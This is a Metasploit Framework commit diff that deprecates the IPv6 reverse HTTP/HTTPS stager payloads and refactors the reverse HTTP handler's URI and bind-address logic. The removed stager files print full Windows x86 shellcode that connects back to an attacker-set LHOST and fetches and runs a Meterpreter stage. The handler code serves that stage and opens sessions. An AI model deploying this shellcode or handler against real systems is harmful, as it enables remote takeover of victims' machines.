Land #3270, @jlee-r7 deprecation ipv6 payloads
These are not needed, since you can just config the regular handler now and pick either. This resolves the conflict (rm'ed the old modules) Conflicts: modules/payloads/stagers/windows/reverse_ipv6_http.rb modules/payloads/stagers/windows/reverse_ipv6_https.rbbug/bundler_fix
commit
c31fc61617
|
@ -31,27 +31,6 @@ module ReverseHttp
|
|||
"tunnel"
|
||||
end
|
||||
|
||||
#
|
||||
# Use the +refname+ to determine whether this handler uses SSL or not
|
||||
#
|
||||
def ssl?
|
||||
!!(self.refname.index("https"))
|
||||
end
|
||||
|
||||
#
|
||||
# Return a URI of the form scheme://host:port/
|
||||
#
|
||||
# Scheme is one of http or https and host is properly wrapped in [] for ipv6
|
||||
# addresses.
|
||||
#
|
||||
def full_uri
|
||||
local_port = bind_port
|
||||
scheme = (ssl?) ? "https" : "http"
|
||||
"#{scheme}://#{datastore['LHOST']}:#{datastore['LPORT']}/"
|
||||
end
|
||||
|
||||
|
||||
|
||||
#
|
||||
# Initializes the HTTP SSL tunneling handler.
|
||||
#
|
||||
|
@ -77,14 +56,64 @@ module ReverseHttp
|
|||
], Msf::Handler::ReverseHttp)
|
||||
end
|
||||
|
||||
#
|
||||
# Toggle for IPv4 vs IPv6 mode
|
||||
#
|
||||
def ipv6
|
||||
self.refname.index('ipv6') ? true : false
|
||||
def ipv6?
|
||||
Rex::Socket.is_ipv6?(datastore['LHOST'])
|
||||
end
|
||||
|
||||
# Determine where to bind the server
|
||||
#
|
||||
# @return [String]
|
||||
def listener_address
|
||||
if datastore['ReverseListenerBindAddress'].to_s.empty?
|
||||
bindaddr = (ipv6?) ? '::' : '0.0.0.0'
|
||||
else
|
||||
bindaddr = datastore['ReverseListenerBindAddress']
|
||||
end
|
||||
|
||||
bindaddr
|
||||
end
|
||||
|
||||
# @return [String] A URI of the form +scheme://host:port/+
|
||||
def listener_uri
|
||||
if ipv6?
|
||||
listen_host = "[#{listener_address}]"
|
||||
else
|
||||
listen_host = listener_address
|
||||
end
|
||||
"#{scheme}://#{listen_host}:#{datastore['LPORT']}/"
|
||||
end
|
||||
|
||||
# Return a URI suitable for placing in a payload.
|
||||
#
|
||||
# Host will be properly wrapped in square brackets, +[]+, for ipv6
|
||||
# addresses.
|
||||
#
|
||||
# @return [String] A URI of the form +scheme://host:port/+
|
||||
def payload_uri
|
||||
if ipv6?
|
||||
callback_host = "[#{datastore['LHOST']}]"
|
||||
else
|
||||
callback_host = datastore['LHOST']
|
||||
end
|
||||
"#{scheme}://#{callback_host}:#{datastore['LPORT']}/"
|
||||
end
|
||||
|
||||
# Use the {#refname} to determine whether this handler uses SSL or not
|
||||
#
|
||||
def ssl?
|
||||
!!(self.refname.index("https"))
|
||||
end
|
||||
|
||||
# URI scheme
|
||||
#
|
||||
# @return [String] One of "http" or "https" depending on whether we
|
||||
# are using SSL
|
||||
def scheme
|
||||
(ssl?) ? "https" : "http"
|
||||
end
|
||||
|
||||
# Create an HTTP listener
|
||||
#
|
||||
def setup_handler
|
||||
|
@ -98,17 +127,11 @@ module ReverseHttp
|
|||
|
||||
local_port = bind_port
|
||||
|
||||
# Determine where to bind the HTTP(S) server to
|
||||
bindaddrs = ipv6 ? '::' : '0.0.0.0'
|
||||
|
||||
if not datastore['ReverseListenerBindAddress'].to_s.empty?
|
||||
bindaddrs = datastore['ReverseListenerBindAddress']
|
||||
end
|
||||
|
||||
# Start the HTTPS server service on this host/port
|
||||
self.service = Rex::ServiceManager.start(Rex::Proto::Http::Server,
|
||||
local_port,
|
||||
bindaddrs,
|
||||
listener_address,
|
||||
ssl?,
|
||||
{
|
||||
'Msf' => framework,
|
||||
|
@ -130,9 +153,7 @@ module ReverseHttp
|
|||
},
|
||||
'VirtualDirectory' => true)
|
||||
|
||||
scheme = (ssl?) ? "https" : "http"
|
||||
bind_url = "#{scheme}://#{bindaddrs}:#{local_port}/"
|
||||
print_status("Started #{scheme.upcase} reverse handler on #{bind_url}")
|
||||
print_status("Started #{scheme.upcase} reverse handler on #{listener_uri}")
|
||||
end
|
||||
|
||||
#
|
||||
|
@ -165,7 +186,6 @@ protected
|
|||
# Parses the HTTPS request
|
||||
#
|
||||
def on_request(cli, req, obj)
|
||||
sid = nil
|
||||
resp = Rex::Proto::Http::Response.new
|
||||
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} Request received for #{req.relative_resource}...")
|
||||
|
@ -176,7 +196,7 @@ protected
|
|||
case uri_match
|
||||
when /^\/INITJM/
|
||||
conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16)
|
||||
url = full_uri + conn_id + "/\x00"
|
||||
url = payload_uri + conn_id + "/\x00"
|
||||
|
||||
blob = ""
|
||||
blob << obj.generate_stage
|
||||
|
@ -266,7 +286,7 @@ protected
|
|||
conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16)
|
||||
i = blob.index("https://" + ("X" * 256))
|
||||
if i
|
||||
url = full_uri + conn_id + "/\x00"
|
||||
url = payload_uri + conn_id + "/\x00"
|
||||
blob[i, url.length] = url
|
||||
end
|
||||
print_status("Patched URL at offset #{i}...")
|
||||
|
@ -308,7 +328,7 @@ protected
|
|||
create_session(cli, {
|
||||
:passive_dispatcher => obj.service,
|
||||
:conn_id => conn_id,
|
||||
:url => full_uri + conn_id + "/\x00",
|
||||
:url => payload_uri + conn_id + "/\x00",
|
||||
:expiration => datastore['SessionExpirationTimeout'].to_i,
|
||||
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
|
||||
:ssl => ssl?,
|
||||
|
|
|
@ -45,6 +45,7 @@ module Msf
|
|||
|
||||
# Map "random" URIs to static strings, allowing us to randomize
|
||||
# the URI sent in the first request.
|
||||
#
|
||||
# @param uri_match [String] The URI string to convert back to the original static value
|
||||
# @return [String] The static URI value derived from the checksum
|
||||
def process_uri_resource(uri_match)
|
||||
|
@ -69,6 +70,7 @@ module Msf
|
|||
end
|
||||
|
||||
# Create a URI that matches a given checksum
|
||||
#
|
||||
# @param sum [Fixnum] The checksum value you are trying to create a URI for
|
||||
# @return [String] The URI string that checksums to the given value
|
||||
def generate_uri_checksum(sum)
|
||||
|
|
|
@ -1,34 +0,0 @@
|
|||
# -*- coding: binary -*-
|
||||
require 'msf/core/handler/reverse_http'
|
||||
|
||||
module Msf
|
||||
module Handler
|
||||
|
||||
###
|
||||
#
|
||||
# This handler implements the HTTP tunneling interface.
|
||||
#
|
||||
###
|
||||
module ReverseIPv6Http
|
||||
|
||||
include Msf::Handler::ReverseHttp
|
||||
|
||||
#
|
||||
# Override the handler_type to indicate IPv6 mode
|
||||
#
|
||||
def self.handler_type
|
||||
return "reverse_ipv6_http"
|
||||
end
|
||||
|
||||
#
|
||||
# Returns the connection-described general handler type, in this case
|
||||
# 'tunnel'.
|
||||
#
|
||||
def self.general_handler_type
|
||||
"tunnel"
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
@ -1,35 +0,0 @@
|
|||
# -*- coding: binary -*-
|
||||
require 'msf/core/handler/reverse_http'
|
||||
require 'msf/core/handler/reverse_https'
|
||||
|
||||
module Msf
|
||||
module Handler
|
||||
|
||||
###
|
||||
#
|
||||
# This handler implements the HTTP SSL tunneling interface.
|
||||
#
|
||||
###
|
||||
module ReverseIPv6Https
|
||||
|
||||
include Msf::Handler::ReverseHttps
|
||||
|
||||
#
|
||||
# Override the handler_type to indicate IPv6 mode
|
||||
#
|
||||
def self.handler_type
|
||||
return "reverse_ipv6_https"
|
||||
end
|
||||
|
||||
#
|
||||
# Returns the connection-described general handler type, in this case
|
||||
# 'tunnel'.
|
||||
#
|
||||
def self.general_handler_type
|
||||
"tunnel"
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
@ -79,7 +79,13 @@ module Metasploit3
|
|||
i = p.index("/12345\x00")
|
||||
u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW) + "\x00"
|
||||
p[i, u.length] = u
|
||||
p + datastore['LHOST'].to_s + "\x00"
|
||||
|
||||
lhost = datastore['LHOST'] || Rex::Socket.source_address
|
||||
if Rex::Socket.is_ipv6?(lhost)
|
||||
lhost = "[#{lhost}]"
|
||||
end
|
||||
|
||||
p + lhost + "\x00"
|
||||
end
|
||||
|
||||
#
|
||||
|
|
|
@ -1,95 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/handler/reverse_ipv6_http'
|
||||
require 'msf/core/module/deprecated'
|
||||
|
||||
module Metasploit3
|
||||
|
||||
include Msf::Payload::Stager
|
||||
include Msf::Payload::Windows
|
||||
include Msf::Module::Deprecated
|
||||
|
||||
DEPRECATION_DATE = Date.new(2014, 7, 30)
|
||||
DEPRECATION_REPLACEMENT = 'windows/meterpreter/reverse_https'
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Reverse HTTP Stager (IPv6)',
|
||||
'Description' => 'Tunnel communication over HTTP and IPv6',
|
||||
'Author' => 'hdm',
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
'Handler' => Msf::Handler::ReverseIPv6Http,
|
||||
'Convention' => 'sockedi http',
|
||||
'Stager' =>
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
# Disabled since it MUST be ExitProcess to work on WoW64 unless we add EXITFUNK support (too big right now)
|
||||
# 'EXITFUNC' => [ 290, 'V' ],
|
||||
'LPORT' => [ 190, 'v' ], # Not a typo, really little endian
|
||||
},
|
||||
'Payload' =>
|
||||
"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
|
||||
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
|
||||
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
|
||||
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
|
||||
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
|
||||
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
|
||||
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
|
||||
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
|
||||
"\x68\x6E\x65\x74\x00\x68\x77\x69\x6E\x69\x54\x68\x4C\x77\x26\x07" +
|
||||
"\xFF\xD5\x31\xFF\x57\x57\x57\x57\x6A\x00\x54\x68\x3A\x56\x79\xA7" +
|
||||
"\xFF\xD5\xEB\x4B\x5B\x31\xC9\x51\x51\x6A\x03\x51\x51\x68\x5C\x11" +
|
||||
"\x00\x00\x53\x50\x68\x57\x89\x9F\xC6\xFF\xD5\xEB\x34\x59\x31\xD2" +
|
||||
"\x52\x68\x00\x02\x20\x84\x52\x52\x52\x51\x52\x50\x68\xEB\x55\x2E" +
|
||||
"\x3B\xFF\xD5\x89\xC6\x6A\x10\x5B\x31\xFF\x57\x57\x57\x57\x56\x68" +
|
||||
"\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x1A\x4B\x74\x10\xEB\xE9\xEB" +
|
||||
"\x49\xE8\xC7\xFF\xFF\xFF\x2F\x31\x32\x33\x34\x35\x00\x68\xF0\xB5" +
|
||||
"\xA2\x56\xFF\xD5\x6A\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00" +
|
||||
"\x57\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x53\x89\xE7\x57\x68\x00" +
|
||||
"\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2\xFF\xD5\x85\xC0\x74\xCD" +
|
||||
"\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3\xE8\x65\xFF\xFF\xFF"
|
||||
}
|
||||
))
|
||||
end
|
||||
|
||||
#
|
||||
# Do not transmit the stage over the connection. We handle this via HTTPS
|
||||
#
|
||||
def stage_over_connection?
|
||||
false
|
||||
end
|
||||
|
||||
#
|
||||
# Generate the first stage
|
||||
#
|
||||
def generate
|
||||
p = super
|
||||
i = p.index("/12345\x00")
|
||||
u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW) + "\x00"
|
||||
p[i, u.length] = u
|
||||
|
||||
lhost = datastore['LHOST'] || "0000:0000:0000:0000:0000:0000:0000:0000"
|
||||
if Rex::Socket.is_ipv6?(lhost)
|
||||
lhost = "[#{lhost}]"
|
||||
end
|
||||
|
||||
p + lhost + "\x00"
|
||||
end
|
||||
|
||||
#
|
||||
# Always wait at least 20 seconds for this payload (due to staging delays)
|
||||
#
|
||||
def wfs_delay
|
||||
20
|
||||
end
|
||||
|
||||
end
|
|
@ -1,96 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/handler/reverse_ipv6_https'
|
||||
require 'msf/core/module/deprecated'
|
||||
|
||||
module Metasploit3
|
||||
|
||||
include Msf::Payload::Stager
|
||||
include Msf::Payload::Windows
|
||||
include Msf::Module::Deprecated
|
||||
|
||||
DEPRECATION_DATE = Date.new(2014, 7, 30)
|
||||
DEPRECATION_REPLACEMENT = 'windows/meterpreter/reverse_https'
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Reverse HTTPS Stager (IPv6)',
|
||||
'Description' => 'Tunnel communication over HTTP using SSL and IPv6',
|
||||
'Author' => 'hdm',
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
'Handler' => Msf::Handler::ReverseIPv6Https,
|
||||
'Convention' => 'sockedi https',
|
||||
'Stager' =>
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
# Disabled since it MUST be ExitProcess to work on WoW64 unless we add EXITFUNK support (too big right now)
|
||||
# 'EXITFUNC' => [ 290, 'V' ],
|
||||
'LPORT' => [ 190, 'v' ], # Not a typo, really little endian
|
||||
},
|
||||
'Payload' =>
|
||||
"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
|
||||
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
|
||||
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
|
||||
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
|
||||
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
|
||||
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
|
||||
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
|
||||
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
|
||||
"\x68\x6E\x65\x74\x00\x68\x77\x69\x6E\x69\x54\x68\x4C\x77\x26\x07" +
|
||||
"\xFF\xD5\x31\xFF\x57\x57\x57\x57\x6A\x00\x54\x68\x3A\x56\x79\xA7" +
|
||||
"\xFF\xD5\xEB\x5F\x5B\x31\xC9\x51\x51\x6A\x03\x51\x51\x68\x5C\x11" +
|
||||
"\x00\x00\x53\x50\x68\x57\x89\x9F\xC6\xFF\xD5\xEB\x48\x59\x31\xD2" +
|
||||
"\x52\x68\x00\x32\xA0\x84\x52\x52\x52\x51\x52\x50\x68\xEB\x55\x2E" +
|
||||
"\x3B\xFF\xD5\x89\xC6\x6A\x10\x5B\x68\x80\x33\x00\x00\x89\xE0\x6A" +
|
||||
"\x04\x50\x6A\x1F\x56\x68\x75\x46\x9E\x86\xFF\xD5\x31\xFF\x57\x57" +
|
||||
"\x57\x57\x56\x68\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x1A\x4B\x74" +
|
||||
"\x10\xEB\xD5\xEB\x49\xE8\xB3\xFF\xFF\xFF\x2F\x31\x32\x33\x34\x35" +
|
||||
"\x00\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x40\x68\x00\x10\x00\x00\x68" +
|
||||
"\x00\x00\x40\x00\x57\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x53\x89" +
|
||||
"\xE7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2\xFF\xD5" +
|
||||
"\x85\xC0\x74\xCD\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3\xE8\x51" +
|
||||
"\xFF\xFF\xFF"
|
||||
}
|
||||
))
|
||||
end
|
||||
|
||||
#
|
||||
# Do not transmit the stage over the connection. We handle this via HTTPS
|
||||
#
|
||||
def stage_over_connection?
|
||||
false
|
||||
end
|
||||
|
||||
#
|
||||
# Generate the first stage
|
||||
#
|
||||
def generate
|
||||
p = super
|
||||
i = p.index("/12345\x00")
|
||||
u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttps::URI_CHECKSUM_INITW) + "\x00"
|
||||
p[i, u.length] = u
|
||||
|
||||
lhost = datastore['LHOST'] || "0000:0000:0000:0000:0000:0000:0000:0000"
|
||||
if Rex::Socket.is_ipv6?(lhost)
|
||||
lhost = "[#{lhost}]"
|
||||
end
|
||||
|
||||
p + lhost + "\x00"
|
||||
end
|
||||
|
||||
#
|
||||
# Always wait at least 20 seconds for this payload (due to staging delays)
|
||||
#
|
||||
def wfs_delay
|
||||
20
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue